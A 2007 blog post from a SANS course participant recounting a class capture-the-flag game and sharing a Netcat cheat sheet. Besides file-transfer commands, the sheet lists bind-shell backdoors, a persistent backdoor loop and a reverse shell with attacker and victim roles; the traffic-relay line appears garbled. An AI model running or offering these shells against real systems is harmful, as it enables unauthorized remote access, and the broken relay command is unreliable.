7.31.2007

All the networking you could need: Netcat

So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber it ended up being quite a lot of fun, especially for a game that only could last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class and playing scenario based ctf brought it all together as many of them were used during the game. Mostly we focused the old favorites: NMap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.

We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife" Netcat proved, as we were promised by Ed, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that, I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possible remind some old hands of some fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistant Backdoor:
while [ 1 ]; nc -l -p [port] -e /bin/sh; done

Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0backpipe

Traffic Replay:
nc [targetip] [port] < [filename]

A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.

Posted by Scott J. Roberts at 23:32

Labels: , , , , ,

2 comments:

Michael said...

Very nice. Copied and pasted to a Sticky right next to my vi cheat sheet.

1/8/07 09:10
Mestizo said...

Nice list! Thanks!

5/8/07 17:26

Post a Comment

Subscribe to: Post Comments (Atom)